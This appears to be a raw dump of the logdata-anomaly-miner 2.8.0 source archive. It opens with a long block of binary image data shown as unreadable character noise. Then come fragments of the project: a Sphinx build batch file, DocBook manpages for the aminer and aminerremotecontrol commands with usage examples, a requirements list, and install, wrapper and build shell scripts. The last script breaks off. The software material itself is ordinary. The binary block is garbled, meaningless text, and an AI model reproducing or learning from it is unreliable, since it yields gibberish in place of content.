&sa/'JuPK|-KkSnm(9ff4’rzc$|:o5}ZI Y,}B'3֦ԩOꒃZah*'2?1_u_ş ~:u3n*N1 dq_ߴ߂;xoƾ#N[HC*1F+U*N-4ox*n-4yQ^Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@zW|U6qq0F!?R~"־X|>ls 0żϻTTG6&&~x{M43km'JТ¾CeȾ+xZoi1*kɐ:6$ބ+v55dFVPH"IIYz0cZzeދ\X[kyn9aaPj~~ŷ7[}I"@XJz'^m3X#H8aٔ`}GT#7]_dEQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@~<"?@ A|N5EkJwfoG5w;>!WCɂq\-VMCQEQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@jc:5M#Jkۗڈ:Vc=[OZz^dw FKn=OŚwM:k_]kS(v& I@:9SikQWo8|%GUMbX GbM}Eꤒ?VuTw՟1~ >'!rQ$IC~~+ >h+ .0hGz<Z*[kb Z?ΧÚ ;=.vFՏRܒIׂ~?ǯGԵ|R!\p;$=++2pjQFN-In5^*hZjr卿Bu#ɯۯ⭬(qv`9#% <N?%S][zΑX˧ #_]G>>"5dEuQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@M[[*~L?"@|1>|J'Y"jl*HA⣆5'R9)aINQEuQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@WE/įAOyy/,z$K]Tz$IwQWd >TeSc {]OF\':RS]Q ?Mqs1Դ=Q%|ׯ-w؍OúK}W5w_b5yA\\^)Q\ŔApAI_Trh'VoPm@%k/[Z~Q_ M MU}\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  +?CcCc꯸W2o/G2o/G_p\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  +?CcCc꯸W2o/G2o/G_p\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  +?CcCc꯸W2o/G2o/G_p\)ϗ? (e_&e_&S/~Q_ M MU}p>_0s>??>?>O|aE~(|6 4(|6 4}UŸŠPm@%hPm@%h? 1K 1KW?  URAf<:Pm@%kGL::"F_>K[J~&xw?xW- 4'8 Zc&ʡAVP;$ۜiwZ?F~fo,FR*:>x;V,pDٚ ? ~߳)ǰt,Ot|G_rq|'E} j?<>wGWc?F}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”W ;֣_q}evF}O(<>wG3 Q_u8x+|?ZgϝQ?>pW ;֣+3|)E} j?<>wGW`Tg?R_q8x+|?Z/ _3pWY]Q_wJ+gϝQ j>?'”8'W_ ;֫?dcM."./{-PYr`/!+R?2A-p1W7to4.?VZ[h{>a7w9=eðm'Ê騢ϪJ (WoI௏62%VZ4!F=р%2y#I*)AEٕ8~ |gvGew8ʶ i郸NwN{P~kYCyeqݤ)p{85b4'\+o][Mԃ=q =(!=sϥmy_#6>K;}B+Y㹷CG4.WůFMRw-/푥tcG%TX63q/kI̚Vڬ[ 1Skjokr8+i?Ѧ?G+o 7ͥؖڊ ǘݷ>lo/ jhk[Uu?ixW/Rկ.tYd !">ՙWzgNk>~>gɏ >V\կu2]]3'5x'_ =2o޼_iV %!n_ |=ivZmƣ{&v[D*N'T87+?jk>8j$|Mjm\E RK"7ꪬI&hzh;Ixve`bSx";:k[$r2xe<c@׭S7X _[`qq^yR 7TU3:˭g>>gɓ,>ouҨ}??1_| wNDw?j'͏{ OoWu~VIiqh::V ƾ(O-j+ xr#? 
OO>&Rl'3K?qVE׍xY%wާ'%Tc00C@.s6:m.'Kxՙ觉4o 4@=a@XdSKAY} ,sc_O*D~fW_o%~ -JԯҿJ`[/2Oy%CW?!ӿnme/.r@sEW% ~]'\_~-sA 6E4I=]?ŭ>S-@rі6e? Sj$:OKPe~|'$,i'$|_ 7_!(~ +_03뿳 $iڤ\4PSb-"n1޼w5_M2J $nG^=Ͼ۽OTu8/Zݡ%Pѱssqh?ᵼ@<zFֳg?k _^s RVUw,=")?|A?|A_Df,~w 7K$2(#q) _%}Qq2ey.|;c,3|mE?:J?d-1 l8eZExs +)_}@Q@|pCZBczMyWu?6)6<9x|7rFzV5x1aYx,0ؐWS_DG'I^@, mcƲC'HHnqW >d_@ZDAX<+_3 [OWR(~,+oCƿ}7?:$˂yzg{Z+D=|s$jӿEƫéY'oqE"VQ]]Eck5#2H碨'Ϳ\).YxApF}G_^?< MFdMHo۷~+hQǔ7-gh3N=O__ᯋ fItQap(>+|Huk'yLV!}̣ WԟW?=_4|⿊z. ifX/1S>`:o ??uh?Ac:[|Y5;157! 8[aBOڽ~Ο=VH-d#O W w %F?Z|Oai 7|pCZoH}uKOrGX߲7{g>|`_:;ǥFe2 F1 o}@IUZq7_D=Dkɘ~5⿱񗈓'iRGbD׷ԟB|MnUxE#1ho'$6f è0k>xk0Ȗbβ$3(rE}F=?$c,-CYQ |4xGÞ9&[Zc+ArJ2~ x-B}#R/X`ކe,o ??uh/]?7$']J0y  Ɋg]dr3QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEW_O*}mXF;o^d?]kuZ{I}w3sŎ7D=ɠ.| /QxT;9HrH*sF]h7VIn<9etpJh?ko/+M}  [|+_uKvZkZEG]2 ^݅|+x_V69[M]A{s}?R 7TU~ е-F-C\[ItInbYXv"_{U~xI>]]H8=Pn{Wn#KsӃ׼Pʿ׃]0N7i,N :9>[+k)2Bk| mC]Aϖ0>D@g?Ue7lqyv0} Ѿ$:OKV݅]bkx^Q)^i@/o(SQ`ҿJ`[/žhks/0^a٩KK+xV9!B'P?G?? \臯~*|~/ç&- `d0e* wXVÿ٣Ÿ mumc2&Sqlë΀>rjG_kW.5Xͳ=!ebTQ^@Q@|pCZ^YP#{Q2A F䏏Oƹ_4>MHkYRNٛ$a (Oۋ@اI^aDhl,mumF'Q@j᎓4S[KpN+rU/jş%~2-z櫩I,,.hJ`>yя?Je`[w_졚4-.QC+)=A޾~~&hk #4T` FriR<#p_!PTd8T `is^$5I<$%dR&xs%,/cY֯x-Űbw1ހ8/Ʒ&]չfHpI9J΋"2:V*FASFѬ|=imvV6# ORI&>'02@\ .цsܯ#Ծm.@ cn63߭zoxG}3]xÕ>Z4}+ղC'o΀=CRp4xl W _ov~ty㰞9[2rQ F3<߰S)uYmV#ؗ|~UKკm<.ƿ2b;z(?쁚+jokrg_?^xW[u,\F".[qX @_!~?1_&־;3,'.5 i7*davs7{g>xbBLi ;p;3I Ҭx6><4ezdkv H#gK%[SO|9Ut{FuK)?*؋G_=b9e/ xSi ,k uQڹ_;GngBTpu}. oJӮo*Qԫ~玡c|f;.̂C}Ԑ~u3\x{^Z܈0·lГԣF{#|!R ĺ|RcB#ip6}híoCvdEg01^]~útw. 'K%,W=:6⫻ȁ`$}K>?*vNUL 2>NUL if errorlevel 9009 ( echo. echo.The 'sphinx-build' command was not found. Make sure you have Sphinx echo.installed, then set the SPHINXBUILD environment variable to point echo.to the full path of the 'sphinx-build' executable. Alternatively you echo.may add the Sphinx directory to PATH. echo. 
echo.If you don't have Sphinx installed, grab it from echo.http://sphinx-doc.org/ exit /b 1 ) %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O% goto end :help %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O% :end popd logdata-anomaly-miner-2.8.0/docs/manpages/000077500000000000000000000000001500476301700204305ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/docs/manpages/aminer.1.xml000066400000000000000000000230141500476301700225640ustar00rootroot00000000000000 .

will be generated. You may view the manual page with: nroff -man .
| less'. A typical entry in a Makefile or Makefile.am is: DB2MAN = /usr/share/sgml/docbook/stylesheet/xsl/docbook-xsl/manpages/docbook.xsl XP = xsltproc -''-nonet -''-param man.charmap.use.subset "0" manpage.1: manpage.xml $(XP) $(DB2MAN) $< The xsltproc binary is found in the xsltproc package. The XSL files are in docbook-xsl. A description of the parameters you can use can be found in the docbook-xsl-doc-* packages. Please remember that if you create the nroff version in one of the debian/rules file targets (such as build), you will need to include xsltproc and docbook-xsl in your Build-Depends control field. Alternatively use the xmlto command/package. That will also automatically pull in xsltproc and docbook-xsl. Notes for using docbook2x: docbook2x-man does not automatically create the AUTHOR(S) and COPYRIGHT sections. In this case, please add them manually as ... . To disable the automatic creation of the AUTHOR(S) and COPYRIGHT sections read /usr/share/doc/docbook-xsl/doc/manpages/authors.html. This file can be found in the docbook-xsl-doc-html package. Validation can be done using: `xmllint -''-noout -''-valid manpage.xml` General documentation about man-pages and man-page-formatting: man(1), man(7), http://www.tldp.org/HOWTO/Man-Page/ --> ]> &dhtitle; &dhpackage; &dhfirstname; &dhsurname; Wrote this manpage for the Debian system.
&dhemail;
2016 &dhusername; This manual page was written for the Debian system (and may be used by others). Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 3. On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL.
AMINER &dhsection; aminer lightweight tool for log checking, log analysis aminer DESCRIPTION This manual page documents briefly the aminer command. For more details see packaged documentation at /usr/share/doc/logdata-anomaly-miner. OPTIONS Specify the configuration file, otherwise /etc/aminer/config.py is used. See /etc/aminer/template_config.py or /etc/aminer/template_config.yml for configuration file templates and examples. With this parameter, aminer will detach from the terminal and daemonize. When not in foreground mode, aminer will also change the working directory to /, hence relative path in configuration file will not work. Set the statistic logging level. Possible stat-levels are 0 for no statistics, 1 (default) for normal statistic level and 2 for verbose statistics. Set the debug logging level. Possible debug-levels are 0 for no debugging, 1 (default) for normal output (INFO and above), 2 for printing all debug information. INTERNAL PARAMETER - DO NOT USE. It is just documented here for completeness. Restores the persistence directory from backup-directory. With this parameter all persisted data in config_properties['Core.PersistenceDir'] is deleted. USE THIS PARAMETER CAREFULLY. IT DELETES ALL SUB-DIRECTORIES OF THE PERSISTENCE DIRECTORY. Remove persisted data of one Detector. --remove NewMatchPathDetector --remove NewMatchPathDetector --remove EventCorrelationDetector With this parameter all live data in config_properties['Core.PersistenceDir']/AnalysisChild/RepositioningData is deleted. Prints the help-screen Prints the version-string FILES /etc/aminer/config.py The main configuration file for the aminer daemon. See /etc/aminer/template_config.py and /etc/aminer/template_config.yml for configuration file templates and examples. BUGS Report bugs via your distribution's bug tracking system. For bugs in the the software trunk, report via at . At startup, aminer will quite likely print out some security warnings to increase transparency. 
They are here just to remind you of the limitations of the current implementation. They should be the same as for nearly all other programs on your platform, just that others do not tell you. See the source code documentation for a short explanation of why a given part of the implementation is not as secure as it could be when leveraging the security features a platform could provide. SEE ALSO aminerremotecontrol1
logdata-anomaly-miner-2.8.0/docs/manpages/aminerremotecontrol.1.xml000066400000000000000000001043571500476301700254130ustar00rootroot00000000000000 .
will be generated. You may view the manual page with: nroff -man .
| less'. A typical entry in a Makefile or Makefile.am is: DB2MAN = /usr/share/sgml/docbook/stylesheet/xsl/docbook-xsl/manpages/docbook.xsl XP = xsltproc -''-nonet -''-param man.charmap.use.subset "0" manpage.1: manpage.xml $(XP) $(DB2MAN) $< The xsltproc binary is found in the xsltproc package. The XSL files are in docbook-xsl. A description of the parameters you can use can be found in the docbook-xsl-doc-* packages. Please remember that if you create the nroff version in one of the debian/rules file targets (such as build), you will need to include xsltproc and docbook-xsl in your Build-Depends control field. Alternatively use the xmlto command/package. That will also automatically pull in xsltproc and docbook-xsl. Notes for using docbook2x: docbook2x-man does not automatically create the AUTHOR(S) and COPYRIGHT sections. In this case, please add them manually as ... . To disable the automatic creation of the AUTHOR(S) and COPYRIGHT sections read /usr/share/doc/docbook-xsl/doc/manpages/authors.html. This file can be found in the docbook-xsl-doc-html package. Validation can be done using: `xmllint -''-noout -''-valid manpage.xml` General documentation about man-pages and man-page-formatting: man(1), man(7), http://www.tldp.org/HOWTO/Man-Page/ --> ]> &dhtitle; &dhpackage; &dhfirstname; &dhsurname; Wrote this manpage for the Debian system.
&dhemail;
2016 &dhusername; This manual page was written for the Debian system (and may be used by others). Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 3. On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL.
AMINERREMOTECONTROL &dhsection; aminerremotecontrol lightweight tool for log checking, log analysis aminerremotecontrol command file DESCRIPTION This manual page documents briefly the aminerremotecontrol command. The command executes arbitrary remote control commands in a running aminer child process. As child process is usually running with lowered privileges or SELinux/AppArmor confinement, you may observe unexpected results when accessing resources outside the child process, e.g. files. For more details see also packaged documentation at /usr/share/doc/logdata-anomaly-miner. Example usecases: /usr/bin/aminerremotecontrol --data '["LogResourceList"]' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' /usr/bin/aminerremotecontrol --exec 'print_current_config(analysis_context)' /usr/bin/aminerremotecontrol --data '["Resources.MaxMemoryUsage", -1]' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' --exec 'change_config_property(analysis_context, "%s" % remote_control_data[0], remote_control_data[1])' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' OPTIONS with long options starting with two dashes ('-'). A summary of options is included below. For a complete description, see the info 1 files. socket Specify the Unix domain remote control socket path, otherwise /var/run/aminer-remote.socket is used. The socket is opened by aminer when 'RemoteControlSocket' feature is enabled in configuration. As the socket is of SOCK_STREAM type, it may also be forwarded via any other stream forwarders, e.g. socat (see UNIX-CONNECT and UNIX-LISTEN) and SSH (see LocalForward, DynamicForward). Access control is only done by file system permissions (DAC) of the socket, so make sure not to widen the access on error. command For each --exec option, the next argument is sent in a separate remote execution request using additional execution data (see --data). 
The command is executed in a separate execution namespace with only some variables added to the local namespace, e.g. execution data is available as 'remote_control_data'. When setting the local variable 'remoteControlResponse' within the executed command, the object is serialized using json and sent back in the response. file For each --exec-file option, the named file is loaded and its content submitted in the very same way as if the --exec parameter had been used with that content as the string. data This parameter defines a JSON string defining Python objects that will be sent with all subsequent --exec operations until changed again using another --data option. Take into account that there are size limits for the request; very large data objects may exceed those limits. The execution context will expose the data as variable 'remote_control_data'. When set, aminerremotecontrol will not pass the result to repr. The returned object is just converted to a plain string via str(object) and the result is printed to avoid escaping of quotation marks, newlines, .... WARNING: This might be insecure: without escaping, the printed data may contain terminal control sequences that exploit vulnerabilities or misconfiguration of your terminal to execute code with the privileges of the terminal or of the process calling aminerremotecontrol (usually root). Commands This method allows you to change properties from the AminerConfig at runtime. For every property to be changed this method must be used. The method prints "property_name changed to value successfully." if the changes were successful and an individual message if the changes failed. Read more about which properties can be changed in the section. This method allows you to change attributes from components of the AminerConfig at runtime. For every attribute to be changed this method must be used. The method prints "component_name.attribute changed to value successfully. 
" if the changes were successful and an individual message if the changes failed. The type of the new value must be the same like the old value of the component_name.attribute example: aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPath','learn_mode', False)" Renames the component from the old_component_name to new_component_name. Therefore the component with the old_component_name is deleted from the registered components and registered with the new_component_name. example: aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPath','NewMatchPathDetector')" Adds the component to the atom_filter and registers it with the component_name. example: aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context,'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True),'NewMatchPathDet')" Prints the property with the property_name from the current AminerConfig. example: aminerremotecontrol --exec "print_config_property(analysis_context,'LogResourceList')" Prints the attribute of the component with the component_name. example: aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context,'NewMatchPath','learn_mode')" Prints the current AminerConfig. It is strongly recommended to use the parameter for better readability. example: aminerremotecontrol --exec "print_current_config(analysis_context)" --string-response Saves the current AminerConfig into destination_file. destination_file must have write permissions by the aminerremotecontrol process or it returns an . example: aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')" Saves all persistence data by calling PersistenceUtil.persist_all(). 
example: aminerremotecontrol --exec "persist_all()" Creates a backup of the current persistence directory and saves it in {persistence_dir}/backup/{timestamp}. Use this preferably after persist_all(). example: aminerremotecontrol --exec "create_backup()" Returns a list of all existing persistence backups. example: aminerremotecontrol --exec "list_backups()" Allowlists a path from event_data with the allowlist_event-method from the corresponding class of the component with the component_name. Only the following classes support allowlisting: EnhancedNewMatchPathValueComboDetector, MissingMatchPathValueDetector, NewMatchPathDetector and NewMatchPathValueComboDetector. For most of the components no allowlisting_data is needed and the event_data is a path. The NewMatchPathDetector supports a list of multiple paths. The MissingMatchPathValueComboDetector needs an integer as allowlisting_data. A positive value sets the interval in seconds to that value. -1 sets the interval to the default value of 3600. A negative value removes the missingMatchPath. Please read the examples of this method to use the correct parameters. example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EnhancedNewMatchPathValueComboDetector','new/path')" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'MissingMatchPathValueDetector','new/path',-11)" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathDetector',['new/path'])" example: aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector','new/path')" This method returns the string representation of a history event with the dump_event_id. If no event with the dump_event_id could be found, the message "FAILURE: the event with dump_event_id could not be found!" is returned. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. 
example: aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',12)" This method deletes the events with the event_ids from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. The number of deleted events is returned. example: aminerremotecontrol --exec "ignore_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" This method lists max_event_count events from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. If max_event_count is None, all events from the history are returned. example: aminerremotecontrol --exec "list_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',600)" This method allowlists the events with the ids in the id_spec_list from the history. history_component_name is the registered component of the class VolatileLogarithmicBackoffEventHistory. The allowlisting response is returned. example: aminerremotecontrol --exec "allowlist_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" Reopen all StreamPrinterEventHandler streams for log rotation. example: aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)" Valid Property Names MailAlerting.TargetAddress Value: 'E-Mail Address' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.TargetAddress', 'root@localhost')" Define a target e-mail address to send alerts to. When undefined, no e-mail notification hooks are added. MailAlerting.FromAddress Value: 'E-Mail Address' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.FromAddress', 'root@localhost')" Sender address of e-mail alerts. 
MailAlerting.SubjectPrefix Value: 'String' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.SubjectPrefix', 'aminer Alerts:')" Define, which text should be prepended to the standard aminer subject. Defaults to "aminer Alerts:" MailAlerting.EventCollectTime Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.EventCollectTime', 10)" Define how many seconds to wait after a first event triggered the alerting procedure before really sending out the e-mail. In that timespan, events are collected and will be sent all using a single e-mail. Defaults to 10 seconds. MailAlerting.MinAlertGap Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MinAlertGap', 600)" Define the minimum time between two alert e-mails in seconds to avoid spamming. All events during this timespan are collected and sent out with the next report. Defaults to 600 seconds. MailAlerting.MaxAlertGap Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MaxAlertGap', 1000)" Define the maximum time between two alert e-mails in seconds. When undefined this defaults to "MailAlerting.MinAlertGap". Otherwise this will activate an exponential backoff to reduce messages during permanent error states by increasing the alert gap by 50% when more alert-worthy events were recorded while the previous gap time was not yet elapsed. MailAlerting.MaxEventsPerMessage Value: Number of messages (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'MailAlerting.MaxEventsPerMessage',1000)" Define how many events should be included in one alert mail at most. This defaults to 1000. 
LogPrefix Value: 'String' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'LogPrefix','Original log line: ')" Most analysis components implement the output_logline-property, which is True by default. Define a prefix to the original captured log lines. This defaults to ''. Resources.MaxMemoryUsage Value: 'Allowed RAM usage in Megabytes (Integer: 32-maxSystemRAM)' Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Resources.MaxMemoryUsage', -1)" This property limits the maximal possible RAM in MB which the aminer process can use. Be careful at choosing the value, as a shortage of memory causes a MemoryError. This defaults to -1, which means that there is no limit. Core.PersistencePeriod Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Core.PersistencePeriod', 300)" Use this property to change the time between persisting data in analysis components. Defaults to 600 seconds. Log.StatisticsLevel Value: Level [0, 1, 2] Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.StatisticsLevel',2)" Change the amount of data saved in statistics. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for verbose statistics. Defaults to 1. Log.DebugLevel Value: Level [0, 1, 2] Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.DebugLevel',2)" Change the debug logging level. Possible debug-levels are 0 for no logging, 1 for normal output (INFO and above), 2 for printing all debug information. Defaults to 1. Log.StatisticsPeriod Value: Seconds (Integer) Example: aminerremotecontrol --exec "change_config_property(analysis_context,'Log.StatisticsPeriod', 360)" Change how often statistics are logged and reset. This defaults to 3600 seconds. FILES /var/run/aminer-remote.socket This is the default remote control socket used when not changed using the --control-socket option. 
BUGS Report bugs via your distribution's bug tracking system. For bugs in the the software trunk, report via at . SEE ALSO aminer 1
logdata-anomaly-miner-2.8.0/docs/requirements.txt000066400000000000000000000000631500476301700221200ustar00rootroot00000000000000sphinx==3.5.1 sphinx_rtd_theme==0.5.1 recommonmark logdata-anomaly-miner-2.8.0/docs/setup.sh000077500000000000000000000006131500476301700203340ustar00rootroot00000000000000#!/bin/bash case "$1" in "install") ln -s ../README.md ln -s ../SECURITY.md ln -s ../LICENSE LICENSE.md git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git ../Wiki ;; "uninstall") unlink README.md unlink SECURITY.md unlink LICENSE.md test -d ../Wiki && rm -rf ../Wiki ;; *) echo "usage: $0 " exit 1 ;; esac logdata-anomaly-miner-2.8.0/pyproject.toml000066400000000000000000000005051500476301700206210ustar00rootroot00000000000000[project] dynamic = ["dependencies"] [tool.setuptools.dynamic] dependencies = {file = ["requirements.txt"]} [tool.vulture] exclude = ["^aecid-testsuite/", "*Interfaces.py", "*Interface.py"] make_whitelist = true min_confidence = 80 paths = ["source/root/usr/lib/logdata-anomaly-miner/"] sort_by_size = true verbose = false logdata-anomaly-miner-2.8.0/requirements.txt000066400000000000000000000002551500476301700211730ustar00rootroot00000000000000orjson pyzmq cerberus kafka-python==2.0.6 patsy statsmodels importlib-metadata tz scipy numpy setuptools dateutil six kafka urllib3 defusedxml yaml patsy pylibacl mypy pytz logdata-anomaly-miner-2.8.0/scripts/000077500000000000000000000000001500476301700173745ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/scripts/addbuildid.sh000077500000000000000000000012651500476301700220240ustar00rootroot00000000000000#!/bin/sh METAPATH="source/root/usr/lib/logdata-anomaly-miner/metadata.py" DOCSCONF="docs/conf.py" # fallback if git is not installed if [ ! `command -v git` ] then echo "Git is not installed. Won't set the BUILD_ID" exit 1 fi BUILD_ID=`git describe --tags --long 2> /dev/null` # fallback if this is not a git installation if [ $? 
-ne 0 ] then echo "This seems not to be a git installation." exit 0 fi BUILD_ID=`echo $BUILD_ID | sed 's/^[Vv]//'` echo "BUILD_ID: $BUILD_ID" if [ -e $METAPATH ] then sed -i "s/__version__\s*=\s*\".*\"/__version__ = \"$BUILD_ID\"/g" $METAPATH fi if [ -e $DOCSCONF ] then sed -i "s/release\s*=\s*'.*'/release = '$BUILD_ID'/g" $DOCSCONF fi exit 0 logdata-anomaly-miner-2.8.0/scripts/aminer_install.sh000077500000000000000000000047721500476301700227460ustar00rootroot00000000000000#!/bin/bash # if set to 1 this installer will delete the # source directory after installation DELDIR=1 BRANCH="main" URL="https://github.com/ait-aecid/logdata-anomaly-miner.git" AMINERDST=`mktemp -d` AMINERSRC="0" DISON=0 help() { echo "Usage: $0 [-h] [-b BRANCH] [-u GITURL] [-s LOCAL_GITREPO_PATH] [-d DIRECTORY]" 1>&2 } while getopts "hb:u:s:d:" options; do case "${options}" in b) BRANCH=${OPTARG} ;; h) help exit 1 ;; u) URL=${OPTARG} ;; s) AMINERSRC=${OPTARG} DELDIR=0 if [ ! -d $AMINERSRC ] then echo "Local Git-Repository $AMINERSRC does not exist." exit 1 fi ;; d) DISON=1 AMINERDST=${OPTARG} if [ -d $AMINERDST ] then echo "This directory($AMINERDST) already exists. Please remove it first" exit 1 fi DELDIR=0 ;; :) echo "$0: Must supply an argument to -$OPTARG." >&2 exit 1 ;; esac done which sudo > /dev/null if [ $? -ne 0 ] then echo "Please install and configure sudo first" exit 1 fi if [ -e /etc/debian_version ]; then sudo /usr/bin/apt-get update sudo DEBIAN_FRONTEND=nointeractive /usr/bin/apt-get install -y -q ansible git elif [ -e /etc/fedora-release ] || [ -e /etc/redhat-release ]; then sudo dnf install -y ansible git else echo "Currently only Debian and Fedora based distributions are supported." echo "More specifically this includes Debian Buster, Debian Bullseye, Debian Bookworm, Ubuntu 20, Ubuntu 22, Ubuntu 24, Fedora, and RedHat." 
echo "If you decide to install the AMiner on another system, please add **--extra-vars \"ansible_distribution == '$DIST' ansible_distribution_major_version == '$VER'\"**." echo "Choose the best-fitting related distribution of the supported ones for $DIST and $VER." exit 1 fi if [ "$AMINERSRC" = "0" ] then git clone -b $BRANCH $URL $AMINERDST else if [ $DISON -eq 1 ] then cp -rap $AMINERSRC $AMINERDST else AMINERDST=$AMINERSRC fi fi cd $AMINERDST test -d roles || mkdir roles git clone -b $BRANCH https://github.com/ait-aecid/aminer-ansible roles/aminer cat > playbook.yml << EOF - hosts: localhost vars: aminer_gitrepo: False # We assume that we cloned the aminer to /home/developer/aminer aminer_repopath: "${AMINERDST}" roles: - aminer EOF # Use this command to deploy the aminer-files # You can add your changes in the aminer-directory # and repeatedly execute this command to deploy # your changes sudo ansible-playbook playbook.yml if [ $DELDIR -eq 1 ] then test -d $AMINERDST && rm -rf $AMINERDST fi exit 0 logdata-anomaly-miner-2.8.0/scripts/aminerwrapper.sh000077500000000000000000000012451500476301700226110ustar00rootroot00000000000000#!/bin/bash AMINERDIR=/usr/lib/logdata-anomaly-miner program=$(basename $0) if [ "$program" == "aminerwrapper.sh" ]; then program=$(basename $1) fi case "$program" in aminer) $AMINERDIR/.venv/bin/python3 $AMINERDIR/aminer.py "${@:1}" ;; aminerremotecontrol) $AMINERDIR/.venv/bin/python3 $AMINERDIR/aminerremotecontrol.py "${@:1}" ;; aminer-persistence) $AMINERDIR/.venv/bin/python3 $AMINERDIR/aminer-persistence.py "${@:1}" ;; supervisor) /usr/bin/supervisord ;; mkdocs) cd /docs make html ;; *) echo "Usage: [ aminer | aminerremotecontrol | aminer-persistence | supervisor | mkdocs ] " echo "$program" exit 1 ;; esac exit 0 logdata-anomaly-miner-2.8.0/scripts/build_docker.sh000077500000000000000000000004531500476301700223630ustar00rootroot00000000000000#!/bin/bash CONTAINER="docker" test $CONTAINER_PROG && CONTAINER=$CONTAINER_PROG 
scripts/addbuildid.sh $CONTAINER build -t aecid/logdata-anomaly-miner:latest -t aecid/logdata-anomaly-miner:$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') . logdata-anomaly-miner-2.8.0/scripts/create_aminerremotecontrol_wiki.sh000077500000000000000000000124331500476301700263740ustar00rootroot00000000000000#!/bin/bash cd /usr/share/man/man1/ sudo xsltproc --output /usr/share/man/man1/aminerremotecontrol.1 -''-nonet -''-param man.charmap.use.subset "0" -''-param make.year.ranges "1" -''-param make.single.year.ranges "1" /usr/share/xml/docbook/stylesheet/docbook-xsl/manpages/docbook.xsl /home/user/Documents/Git_projects/logdata-anomaly-miner/docs/manpages/aminerremotecontrol.1.xml && sudo gzip /usr/share/man/man1/aminerremotecontrol.1 sudo gunzip /usr/share/man/man1/aminerremotecontrol.1.gz sudo cp /usr/share/man/man1/aminerremotecontrol.1 /tmp sudo chown user:user /tmp/aminerremotecontrol.1 sudo apt install pandoc pandoc --from man --to gfm /tmp/aminerremotecontrol.1 -o /tmp/aminerremotecontrol.md # man-to-github-flawored-markdown # quotes are not successfully recreated from the parser.. 
